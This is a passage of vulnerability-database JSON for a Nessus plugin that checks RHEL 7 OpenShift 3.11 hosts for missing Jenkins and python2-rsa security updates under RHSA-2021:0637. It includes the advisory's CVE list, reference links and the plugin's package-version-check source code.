RHSA-2021:0637 advisory.\n\n - ant: insecure temporary file (CVE-2020-11979)\n\n - ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n - jenkins-2-plugins/subversion: XML parser is not preventing XML external entity (XXE) attacks (CVE-2020-2304)\n\n - jenkins-2-plugins/mercurial: XML parser is not preventing XML external entity (XXE) attacks (CVE-2020-2305)\n\n - jenkins-2-plugins/mercurial: Missing permission check in an HTTP endpoint could result in information disclosure (CVE-2020-2306)\n\n - jenkins-2-plugins/kubernetes: Jenkins controller environment variables are accessible in Kubernetes Plugin (CVE-2020-2307)\n\n - jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows listing pod templates (CVE-2020-2308)\n\n - jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows enumerating credentials IDs (CVE-2020-2309)\n\n - python-rsa: bleichenbacher timing oracle attack against RSA decryption (CVE-2020-25658)\n\n - jenkins: Arbitrary file read vulnerability in workspace browsers (CVE-2021-21602)\n\n - jenkins: XSS vulnerability in notification bar (CVE-2021-21603)\n\n - jenkins: Improper handling of REST API XML deserialization errors (CVE-2021-21604)\n\n - jenkins: Path traversal vulnerability in agent names (CVE-2021-21605)\n\n - jenkins: Arbitrary file existence check in file fingerprints (CVE-2021-21606)\n\n - jenkins: Excessive memory allocation in graph URLs leads to denial of service (CVE-2021-21607)\n\n - jenkins: Stored XSS vulnerability in button labels (CVE-2021-21608)\n\n - jenkins: Missing permission check for paths with specific prefix (CVE-2021-21609)\n\n - jenkins: Reflected XSS vulnerability in markup formatter preview (CVE-2021-21610)\n\n - jenkins: Stored XSS vulnerability on new item page (CVE-2021-21611)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-03-03T00:00:00", "modified": "2021-07-26T00:00:00", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cvss2": {}, "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"}, "href": "https://www.tenable.com/plugins/nessus/147013", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://access.redhat.com/security/cve/CVE-2021-21611", "https://bugzilla.redhat.com/1889972", "https://bugzilla.redhat.com/1895941", "https://access.redhat.com/security/cve/CVE-2020-1945", "https://access.redhat.com/security/cve/CVE-2020-2306", "https://access.redhat.com/security/cve/CVE-2021-21606", "https://access.redhat.com/security/cve/CVE-2021-21610", "https://bugzilla.redhat.com/1895947", "https://bugzilla.redhat.com/1925141", "https://bugzilla.redhat.com/1925156", "https://bugzilla.redhat.com/1925157", "https://cwe.mitre.org/data/definitions/502.html", "https://bugzilla.redhat.com/1903702", "https://access.redhat.com/security/cve/CVE-2020-11979", "https://cwe.mitre.org/data/definitions/200.html", "https://cwe.mitre.org/data/definitions/20.html", "https://bugzilla.redhat.com/1837444", "https://cwe.mitre.org/data/definitions/863.html", "https://access.redhat.com/security/cve/CVE-2020-2308", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2306", "https://access.redhat.com/security/cve/CVE-2020-2305", "https://bugzilla.redhat.com/1895939", "https://bugzilla.redhat.com/1925160", "https://access.redhat.com/security/cve/CVE-2020-2307", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1945", "https://bugzilla.redhat.com/1925151", "https://access.redhat.com/security/cve/CVE-2021-21609", "https://bugzilla.redhat.com/1895945", "https://cwe.mitre.org/data/definitions/862.html", "https://bugzilla.redhat.com/1925143", "https://bugzilla.redhat.com/1895940", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2307", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2308", "https://cwe.mitre.org/data/definitions/611.html", "https://bugzilla.redhat.com/1895946", "https://access.redhat.com/security/cve/CVE-2021-21603", "https://bugzilla.redhat.com/1925145", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2304", "https://access.redhat.com/security/cve/CVE-2021-21604", "https://access.redhat.com/security/cve/CVE-2021-21605", "https://access.redhat.com/security/cve/CVE-2021-21608", "https://access.redhat.com/security/cve/CVE-2021-21602", "https://bugzilla.redhat.com/1925161", "https://cwe.mitre.org/data/definitions/59.html", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25658", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2305", "https://access.redhat.com/security/cve/CVE-2021-21607", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2309", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11979", "https://cwe.mitre.org/data/definitions/377.html", "https://cwe.mitre.org/data/definitions/770.html", "https://access.redhat.com/errata/RHSA-2021:0637", "https://access.redhat.com/security/cve/CVE-2020-25658", "https://bugzilla.redhat.com/1925140", "https://cwe.mitre.org/data/definitions/79.html", "https://cwe.mitre.org/data/definitions/385.html", "https://access.redhat.com/security/cve/CVE-2020-2309", "https://bugzilla.redhat.com/1925159", "https://access.redhat.com/security/cve/CVE-2020-2304"], "cvelist": ["CVE-2020-1945", "CVE-2020-2304", "CVE-2020-2305", "CVE-2020-2306", "CVE-2020-2307", "CVE-2020-2308", "CVE-2020-2309", "CVE-2020-11979", "CVE-2020-25658"], "immutableFields": [], "lastseen": "2021-08-06T13:27:20", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "redhatcve", "idList": ["RH:CVE-2020-1945", "RH:CVE-2021-21605", "RH:CVE-2020-25658", "RH:CVE-2021-21606", "RH:CVE-2020-2306", "RH:CVE-2020-2304", "RH:CVE-2021-21611", "RH:CVE-2020-2307", "RH:CVE-2021-21602", "RH:CVE-2021-21604", "RH:CVE-2020-2305", "RH:CVE-2021-21607", "RH:CVE-2021-21609", "RH:CVE-2021-21608", "RH:CVE-2020-2308", "RH:CVE-2021-21610", "RH:CVE-2020-11979", "RH:CVE-2021-21603", "RH:CVE-2020-2309"]}, {"type": "redhat", "idList": ["RHSA-2021:0637", "RHSA-2021:0034", "RHSA-2021:0037", "RHSA-2020:5634", "RHSA-2021:0038", "RHSA-2020:2618", "RHSA-2021:0282", "RHSA-2021:0039", "RHSA-2021:0719", "RHSA-2021:0423"]}, {"type": "nessus", "idList": ["FEDORA_2020-2640AA4E19.NASL", "PHOTONOS_PHSA-2020-1_0-0335_APACHE.NASL", "EULEROS_SA-2021-1133.NASL", "PHOTONOS_PHSA-2020-3_0-0155_APACHE.NASL", "GENTOO_GLSA-202011-18.NASL", "FEDORA_2020-92B1D001B3.NASL", "FEDORA_2020-3CE0F55BC5.NASL", "PHOTONOS_PHSA-2020-2_0-0291_APACHE.NASL", "REDHAT-RHSA-2021-0038.NASL", "REDHAT-RHSA-2021-0034.NASL"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-11979", "UB:CVE-2020-25658", "UB:CVE-2020-1945"]}, {"type": "cve", "idList": ["CVE-2020-2308", "CVE-2020-25658", "CVE-2020-2306", "CVE-2020-2304", "CVE-2020-2309", "CVE-2020-2305", "CVE-2020-11979", "CVE-2020-1945", "CVE-2020-2307"]}, {"type": "archlinux", "idList": ["ASA-202005-15", "ASA-202012-5"]}, {"type": "github", "idList": ["GHSA-XRX6-FMXQ-RJJ2", "GHSA-4P6W-M9WC-C9C9", "GHSA-F62V-XPXF-3V68"]}, {"type": "gentoo", "idList": ["GLSA-202011-18", "GLSA-202007-34"]}, {"type": "fedora", "idList": ["FEDORA:2D51F60C28B2", "FEDORA:88EAA30905CF", "FEDORA:146FE30DD5E7", "FEDORA:6869030D3139", "FEDORA:52396606732B"]}, {"type": "ubuntu", "idList": ["USN-4380-1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310877939", "OPENVAS:1361412562310877930", "OPENVAS:1361412562310844454"]}, {"type": "freebsd", "idList": ["6D5F1B0B-B865-48D5-935B-3FB6EBB425FC"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1022-1"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2021", "ORACLE:CPUAPR2021", "ORACLE:CPUJUL2021", "ORACLE:CPUJUL2020", "ORACLE:CPUOCT2020"]}], "modified": "2021-08-06T13:27:20", "rev": 2}, "score": {"value": 6.8, "vector": "NONE", "modified": "2021-08-06T13:27:20", "rev": 2}}, "objectVersion": "1.6", "pluginID": "147013", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:0637. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147013);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/07/26\");\n\n script_cve_id(\n \"CVE-2020-1945\",\n \"CVE-2020-2304\",\n \"CVE-2020-2305\",\n \"CVE-2020-2306\",\n \"CVE-2020-2307\",\n \"CVE-2020-2308\",\n \"CVE-2020-2309\",\n \"CVE-2020-11979\",\n \"CVE-2020-25658\"\n );\n script_xref(name:\"RHSA\", value:\"2021:0637\");\n script_xref(name:\"IAVA\", value:\"2020-A-0324\");\n script_xref(name:\"IAVA\", value:\"2021-A-0035-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0196\");\n script_xref(name:\"IAVA\", value:\"2021-A-0039-S\");\n\n script_name(english:\"RHEL 7 : OpenShift Container Platform 3.11.394 bug fix and (RHSA-2021:0637)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:0637 advisory.\n\n - ant: insecure temporary file (CVE-2020-11979)\n\n - ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n - jenkins-2-plugins/subversion: XML parser is not preventing XML external entity (XXE) attacks\n (CVE-2020-2304)\n\n - jenkins-2-plugins/mercurial: XML parser is not preventing XML external entity (XXE) attacks\n (CVE-2020-2305)\n\n - jenkins-2-plugins/mercurial: Missing permission check in an HTTP endpoint could result in information\n disclosure (CVE-2020-2306)\n\n - jenkins-2-plugins/kubernetes: Jenkins controller environment variables are accessible in Kubernetes Plugin\n (CVE-2020-2307)\n\n - jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows listing pod templates\n (CVE-2020-2308)\n\n - jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows enumerating credentials\n IDs (CVE-2020-2309)\n\n - python-rsa: bleichenbacher timing oracle attack against RSA decryption (CVE-2020-25658)\n\n - jenkins: Arbitrary file read vulnerability in workspace browsers (CVE-2021-21602)\n\n - jenkins: XSS vulnerability in notification bar (CVE-2021-21603)\n\n - jenkins: Improper handling of REST API XML deserialization errors (CVE-2021-21604)\n\n - jenkins: Path traversal vulnerability in agent names (CVE-2021-21605)\n\n - jenkins: Arbitrary file existence check in file fingerprints (CVE-2021-21606)\n\n - jenkins: Excessive memory allocation in graph URLs leads to denial of service (CVE-2021-21607)\n\n - jenkins: Stored XSS vulnerability in button labels (CVE-2021-21608)\n\n - jenkins: Missing permission check for paths with specific prefix (CVE-2021-21609)\n\n - jenkins: Reflected XSS vulnerability in markup formatter preview (CVE-2021-21610)\n\n - jenkins: Stored XSS vulnerability on new item page (CVE-2021-21611)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/20.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/59.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/79.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/200.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/377.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/385.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/502.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/611.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/770.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/862.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/863.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-1945\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2304\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2305\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2306\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2307\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2308\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2309\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-11979\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-25658\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21602\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21603\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21604\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21605\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21606\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21607\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21608\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21609\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21610\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21611\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:0637\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1837444\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1889972\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895939\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895940\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895941\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895945\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895946\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895947\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1903702\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925141\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925143\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925145\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925151\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925156\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925157\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925159\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925161\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected jenkins, jenkins-2-plugins and / or python2-rsa packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11979\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 59, 79, 200, 377, 385, 502, 611, 770, 862, 863);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jenkins-2-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python2-rsa\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '7')) audit(AUDIT_OS_NOT, 'Red Hat 7.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nrepositories = {\n 'openshift_3_11_el7': [\n 'rhel-7-server-ose-3.11-debug-rpms',\n 'rhel-7-server-ose-3.11-rpms',\n 'rhel-7-server-ose-3.11-source-rpms'\n ]\n};\n\nrepo_sets = rhel_get_valid_repo_sets(repositories:repositories);\nif(repo_sets == RHEL_REPOS_NO_OVERLAP_MESSAGE || empty_or_null(repo_sets)) audit(AUDIT_PACKAGE_LIST_MISSING, RHEL_REPO_AUDIT_PACKAGE_LIST_DETAILS);\n\npkgs = [\n {'reference':'jenkins-2-plugins-3.11.1612862361-1.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_3_11_el7']},\n {'reference':'jenkins-2.263.3.1612433584-1.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_3_11_el7']},\n {'reference':'python2-rsa-4.5-3.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_3_11_el7']}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n repocheck = rhel_decide_repo_check(repo_list:repo_list, repo_sets:repo_sets);\n if (repocheck && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n if (empty_or_null(repo_sets)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'jenkins / jenkins-2-plugins / python2-rsa');\n}\n", "naslFamily": "Red Hat Local Security Checks", "cpe": ["cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:jenkins", "p-cpe:/a:redhat:enterprise_linux:jenkins-2-plugins", "p-cpe:/a:redhat:enterprise_linux:python2-rsa"], "solution": "Update the affected jenkins, jenkins-2-plugins and / or python2-rsa packages.", "nessusSeverity": "", "cvssScoreSource": "CVE-2020-11979", "vpr": {"risk factor": "Medium", "score": "6"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2021-03-03T00:00:00", "vulnerabilityPublicationDate": "2020-05-14T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-06T13:27:20", "differentElements": ["nessusSeverity"], "edition": 8}, {"bulletin": {"id": "REDHAT-RHSA-2021-0637.NASL", "hash": "c0d1404cd298285c87bedf2fe4108c7f", "type": "nessus", "bulletinFamily": "scanner", "title": "RHEL 7 : OpenShift Container Platform 3.11.394 bug fix and (RHSA-2021:0637)", "description": "The remote Redhat Enterprise Linux 7 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2021:0637 advisory.\n\n - ant: insecure temporary file (CVE-2020-11979)\n\n - ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n - jenkins-2-plugins/subversion: XML parser is not preventing XML external entity (XXE) attacks (CVE-2020-2304)\n\n - jenkins-2-plugins/mercurial: XML parser is not preventing XML external entity (XXE) attacks (CVE-2020-2305)\n\n - jenkins-2-plugins/mercurial: Missing permission check in an HTTP endpoint could result in information disclosure (CVE-2020-2306)\n\n - jenkins-2-plugins/kubernetes: Jenkins controller environment variables are accessible in Kubernetes Plugin (CVE-2020-2307)\n\n - jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows listing pod templates (CVE-2020-2308)\n\n - jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows enumerating credentials IDs (CVE-2020-2309)\n\n - python-rsa: bleichenbacher timing oracle attack against RSA decryption (CVE-2020-25658)\n\n - jenkins: Arbitrary file read vulnerability in workspace browsers (CVE-2021-21602)\n\n - jenkins: XSS vulnerability in notification bar (CVE-2021-21603)\n\n - jenkins: Improper handling of REST API XML deserialization errors (CVE-2021-21604)\n\n - jenkins: Path traversal vulnerability in agent names (CVE-2021-21605)\n\n - jenkins: Arbitrary file existence check in file fingerprints (CVE-2021-21606)\n\n - jenkins: Excessive memory allocation in graph URLs leads to denial of service (CVE-2021-21607)\n\n - jenkins: Stored XSS vulnerability in button labels (CVE-2021-21608)\n\n - jenkins: Missing permission check for paths with specific prefix (CVE-2021-21609)\n\n - jenkins: Reflected XSS vulnerability in markup formatter preview (CVE-2021-21610)\n\n - jenkins: Stored XSS vulnerability on new item page (CVE-2021-21611)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-03-03T00:00:00", "modified": "2021-07-26T00:00:00", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cvss2": {}, "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"}, "href": "https://www.tenable.com/plugins/nessus/147013", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://bugzilla.redhat.com/1925160", "https://access.redhat.com/security/cve/CVE-2021-21606", "https://cwe.mitre.org/data/definitions/20.html", "https://access.redhat.com/security/cve/CVE-2020-2305", "https://cwe.mitre.org/data/definitions/79.html", "https://bugzilla.redhat.com/1895941", "https://cwe.mitre.org/data/definitions/863.html", "https://bugzilla.redhat.com/1925145", "https://bugzilla.redhat.com/1925161", "https://access.redhat.com/security/cve/CVE-2020-2307", "https://access.redhat.com/security/cve/CVE-2021-21609", "https://bugzilla.redhat.com/1925156", "https://cwe.mitre.org/data/definitions/200.html", "https://bugzilla.redhat.com/1889972", "https://bugzilla.redhat.com/1925143", "https://access.redhat.com/security/cve/CVE-2020-2309", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2308", "https://cwe.mitre.org/data/definitions/502.html", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2306", "https://bugzilla.redhat.com/1903702", "https://access.redhat.com/security/cve/CVE-2020-1945", "https://cwe.mitre.org/data/definitions/377.html", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2309", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2305", "https://access.redhat.com/security/cve/CVE-2021-21611", "https://access.redhat.com/security/cve/CVE-2020-2306", "https://access.redhat.com/security/cve/CVE-2021-21603", "https://bugzilla.redhat.com/1925141", "https://cwe.mitre.org/data/definitions/59.html", "https://access.redhat.com/security/cve/CVE-2020-2308", "https://access.redhat.com/security/cve/CVE-2020-25658", "https://access.redhat.com/security/cve/CVE-2021-21608", "https://bugzilla.redhat.com/1895939", "https://bugzilla.redhat.com/1925140", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1945", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2304", "https://access.redhat.com/errata/RHSA-2021:0637", "https://access.redhat.com/security/cve/CVE-2021-21604", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11979", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25658", "https://cwe.mitre.org/data/definitions/770.html", "https://access.redhat.com/security/cve/CVE-2020-2304", "https://access.redhat.com/security/cve/CVE-2021-21610", "https://access.redhat.com/security/cve/CVE-2021-21607", "https://access.redhat.com/security/cve/CVE-2021-21602", "https://bugzilla.redhat.com/1925157", "https://cwe.mitre.org/data/definitions/611.html", "https://bugzilla.redhat.com/1925159", "https://cwe.mitre.org/data/definitions/862.html", "https://bugzilla.redhat.com/1925151", "https://access.redhat.com/security/cve/CVE-2020-11979", "https://bugzilla.redhat.com/1837444", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2307", "https://bugzilla.redhat.com/1895946", "https://bugzilla.redhat.com/1895947", "https://bugzilla.redhat.com/1895945", "https://bugzilla.redhat.com/1895940", "https://cwe.mitre.org/data/definitions/385.html", "https://access.redhat.com/security/cve/CVE-2021-21605"], "cvelist": ["CVE-2020-1945", "CVE-2020-2304", "CVE-2020-2305", "CVE-2020-2306", "CVE-2020-2307", "CVE-2020-2308", "CVE-2020-2309", "CVE-2020-11979", "CVE-2020-25658"], "immutableFields": [], "lastseen": "2021-08-19T12:06:10", "history": [], "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "redhatcve", "idList": ["RH:CVE-2020-2304", "RH:CVE-2020-11979", "RH:CVE-2021-21609", "RH:CVE-2021-21608", "RH:CVE-2020-2307", "RH:CVE-2021-21610", "RH:CVE-2020-2305", "RH:CVE-2020-2309", "RH:CVE-2020-2308", "RH:CVE-2020-1945", "RH:CVE-2021-21605", "RH:CVE-2021-21602", "RH:CVE-2021-21606", "RH:CVE-2021-21604", "RH:CVE-2020-2306", "RH:CVE-2021-21607", "RH:CVE-2020-25658", "RH:CVE-2021-21603", "RH:CVE-2021-21611"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2021-0423.NASL", "FEDORA_2020-7F07DA3FEF.NASL", "FEDORA_2020-92B1D001B3.NASL", "EULEROS_SA-2020-1794.NASL", "PHOTONOS_PHSA-2020-3_0-0155_APACHE.NASL", "OPENSUSE-2020-1022.NASL", 